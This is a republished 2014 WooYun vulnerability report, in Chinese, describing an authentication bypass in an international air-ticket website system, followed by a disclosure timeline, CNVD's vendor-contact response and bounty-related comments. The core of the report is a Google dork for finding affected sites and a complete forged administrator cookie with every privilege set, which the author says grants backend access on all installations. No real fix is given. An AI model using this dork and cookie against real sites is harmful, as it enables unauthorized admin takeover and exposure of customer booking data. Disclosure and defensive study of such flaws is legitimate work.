某国际机票建站系统权限绕过导致可通杀进入后台

admin
admin
admin
140846
文章
117
评论
2015年4月24日08:33:28评论421 views字数 238阅读0分47秒阅读模式
摘要

2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-12: 厂商已经确认,细节仅向厂商公开
2014-07-15: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2014-67538

漏洞标题: 某国际机票建站系统权限绕过导致可通杀进入后台 某国际机票建站系统权限绕过导致可通杀进入后台

相关厂商: 际珂软件

漏洞作者: zph

提交时间: 2014-07-09 17:09

公开时间: 2014-10-05 17:10

漏洞类型: 非授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷/边界绕过

2人收藏

漏洞详情

披露状态:

2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-12: 厂商已经确认,细节仅向厂商公开
2014-07-15: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

简要描述:

某国际机票建站系统后台权限绕过导致可进入后台

详细说明:

搜索 inurl:Flight/InternationalTicket.asp

找到约 3,240 条结果 (用时 0.23 秒)

用的人不多,但是也是有一些网站在用的 比如 http://**.**.**.**/

某国际机票建站系统权限绕过导致可通杀进入后台

cookies:

code 区域 
AJSTAT_ok_times=2; pgv_pvi=8454968320; AJSTAT_ok_times=3; AJSTAT_ok_pages=1; ASPSESSIONIDCSBRDTCA=LNMNNDMADPIJNFCFLAPAOCEE; GetCode=9375; Admin%5FLoginTime=2013%2D9%2D19+1%3A57%3A37; AdminLevel=1; AdminRight=Manager%5FStaff%5FView%2CManager%5FStaff%5FAdd%2CManager%5FStaff%5FManage%2CManager%5FStaff%5FRight%2CManager%5FMember%5FView%2CManager%5FMember%5FAdd%2CManager%5FMember%5FManage%2CManager%5FMember%5FRight%2CManager%5FLogView%2CManager%5FLogSearch%2CSystem%5FConfig%2CSystem%5FCity%2CSystem%5FFinancial%2CSystem%5FMessage%2CCustom%5FManage%2CCustom%5FAgent%2COrder%5FFlight%5FAdd%2COrder%5FFlight%5FView%2COrder%5FFlight%5FDeal%2COrder%5FFlight%5FManage%2COrder%5FHotel%5FAdd%2COrder%5FHotel%5FView%2COrder%5FHotel%5FDeal%2COrder%5FHotel%5FManage%2COrder%5FTravel%5FAdd%2COrder%5FTravel%5FView%2COrder%5FTravel%5FDeal%2COrder%5FTravel%5FManage%2CNews%5FCenter%2CNews%5FWeb%2CAir%5FCab%2CAir%5FMultiCab%2CAir%5FSpePrice%2CAir%5FInternal%2CAir%5FBack%2CAir%5FMultiBack%2CAir%5FMinPrice%2CAir%5FAirport%2CAir%5FCarrier%2CAir%5FCabVisor%2CAir%5FFlight%2CHotel%5FInfo%2CHotel%5FArea%2CHotel%5FHotCity%2CTour%5FInfo%2CDestination%5FInfo%2CBusiness%5FView%2CBusiness%5FAdd%2CBusiness%5FManage%2CPost%5FView%2CPost%5FAdd%2CPost%5FManage%2COrder%5FFlight%5FManage%5FA%2COrder%5FFlight%5FManage%5FB%2COrder%5FFlight%5FManage%5FP%2COrder%5FFlight%5FManage%5FF%2COrder%5FFlight%5FManage%5FG%2CFlight%5FOrder%5FAdd%2CFlight%5FOrder%5FSearch%2CFlight%5FOrder%5FView%2CFlight%5FOrder%5FDeal%2CFlight%5FOrder%5FEdit%2CFlight%5FOrder%5FDel%2CFlight%5FOrder%5FSL%2CFlight%5FOrder%5FQX%2CFlight%5FOrder%5FHY%2CFlight%5FOrder%5FPay%2CFlight%5FOrder%5FCP%2CFlight%5FOrder%5FPS%2CFlight%5FOrder%5FJS%2CFlight%5FOrder%5FGQ%2CFlight%5FOrder%5FJ%5FS%2CFlight%5FOrder%5FDY%2CSpePrice%5FOrder%5FView%2CSpePrice%5FOrder%5FHandle%2CSystem%5F2%5F1%2CSystem%5F2%5F2%2CSystem%5F2%5F3%2CSystem%5F2%5F10%2CSystem%5F2%5F11%2CSystem%5F2%5F4%2CSystem%5F2%5F6%2CSystem%5F2%5F7%2CSystem%5F2%5F8%2CSystem%5F2%5F9%2CFlightGj%5F1%2CFlightGj%5F5%2CCustom%5FSeach%2CCustom%5FView%2CCustom%5FAdd%2CCustom%5FEdit%2CCustom%5FDel%2CCard%5FImport%2CCard%5FManage%2CUser%5FGrade%5FManage%2CUser%5FJifen%5FManage%2CUser%5FJianyi%2CGife%5F1%2CGife%5F2%2CGife%5F3%2CGife%5F4%2CSystem%5F5%5F1%2CSystem%5F5%5F2%2CSystem%5F5%5F3%2CSystem%5F5%5F4%2CSystem%5F5%5F5%2CPay%5FSuccess%5F1%2CSystem%5F1%5F1%2CSystem%5F1%5F8%2CSystem%5F1%5F9%2CSystem%5F1%5F2%2CSystem%5F1%5F5%2CSystem%5F1%5F4%2CSystem%5F1%5F3%2CSystem%5F1%5F6%2CSystem%5F1%5F7%2CSystem%5F4%5F1%2CSystem%5F4%5F2%2CSystem%5F6%5F1%2CSystem%5F6%5F2%2CSystem%5F6%5F3%2CSystem%5F6%5F4%2CSystem%5F6%5F5%2CSystem%5F6%5F6%2CSystem%5F6%5F7; Admin%5FKeepPass=abc; AdminLogin=abc; Admin%5FConfig=%7C%7C; AdminLocat; Admin%5FUidStr=800639%40XTKIQYS5%40admintrip%40%E7%AE%A1%E7%90%86%E5%91%98; Admin%5Fuid=1068; Time934fdiou22=2013%2D9%2D19+1%3A57%3A40; Time934fdiou=2013%2D9%2D19+1%3A57%3A40

这个cookies具体为什么可以通杀,你们懂得,不多解释呵呵

修改cookies后即可进入后台

部分美图:

某国际机票建站系统权限绕过导致可通杀进入后台

某国际机票建站系统权限绕过导致可通杀进入后台

某国际机票建站系统权限绕过导致可通杀进入后台

某国际机票建站系统权限绕过导致可通杀进入后台

某国际机票建站系统权限绕过导致可通杀进入后台

某国际机票建站系统权限绕过导致可通杀进入后台

漏洞证明:

某国际机票建站系统权限绕过导致可通杀进入后台

修复方案:

你懂得

版权声明:转载请注明来源 zph@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-07-12 13:01

厂商回复:

CNVD确认并复现所述情况(通过实例确认通用性),尝试联系软件生产厂商际柯软件公司,联系***,对方拒绝提供邮箱并直接挂断电话。后向网站客服邮箱发送通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

0%

100%

0%

0%

评价

  1. 2014-07-07 17:28 | Haswell ( 普通白帽子 | Rank:182 漏洞数:19 | HorizonSec @ RDFZ)

    0

  2. 2014-07-07 17:30 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @Haswell thx 某国际机票建站系统权限绕过导致可通杀进入后台

  3. 2014-07-09 11:10 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @ZPH这个是小厂商吗

  4. 2014-07-09 11:24 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 不清楚呃 他们官网 http://www.jikee.net/

  5. 2014-07-09 11:43 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @ZPH我在360库带里投一个这个系统的注入漏洞居然是小厂商啊,不过估计在乌云应该是大厂商啊

  6. 2014-07-09 13:47 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 某国际机票建站系统权限绕过导致可通杀进入后台 我不清楚呃……

  7. 2014-07-12 06:07 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @cncert国家互联网应急中心 怎么确认这么慢啊……

  8. 2014-07-13 20:23 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    另外,@际珂软件 用户密码貌似全是明文记录的,是否至少应该用MD5加个密?

  9. 2014-07-25 12:31 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @xsser @疯狗 不给rmb么?

  10. 2014-07-25 17:11 | 疯狗 某国际机票建站系统权限绕过导致可通杀进入后台 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    0

    @zph 这个有奖金

  11. 2014-07-25 19:43 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @疯狗 好的,感谢 某国际机票建站系统权限绕过导致可通杀进入后台

  12. 2014-07-25 20:22 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @疯狗 请问像这种通用 WooYun: 某通用型企业建站系统SQL注入 有奖金吗

  13. 2014-07-28 10:51 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

  14. 2014-07-28 11:00 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 呃,别在这说啊,你去zone里面发帖at,这是漏洞,不是帖子

  15. 2014-08-14 18:37 | 番茄师傅 ( 普通白帽子 | Rank:354 漏洞数:95 | http://www.tomatoyu.com/)

    0

    对方拒绝提供邮箱并直接挂断电话。后向网站客服邮箱发送通报。

  16. 2014-08-14 18:38 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @番茄师傅 说明这厂商态度也不咋地。

  17. 2014-08-14 18:42 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    这个发的这么快的奖金

  18. 2014-08-14 18:43 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    尼玛,这个差不多十来天就发奖金了

  19. 2014-08-14 19:24 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @U神 呵呵。

  20. 2014-08-14 19:24 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 呵呵。

  21. 2014-08-14 19:34 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @zph 哈哈 大牛你好

  22. 2014-08-14 20:29 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 你好

  23. 2014-08-14 20:29 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 这个漏洞奖金确实发的快,其他的好几个到现在还没发

  24. 2014-08-14 20:52 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @zph 其他的你有的等了啊

  25. 2014-08-14 21:01 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

    0

    @贫道来自河北 哈哈

  26. 2014-08-14 21:07 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @zph 我7月4号的都没法呢,现在一般的通用奖金才发到6月20号

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin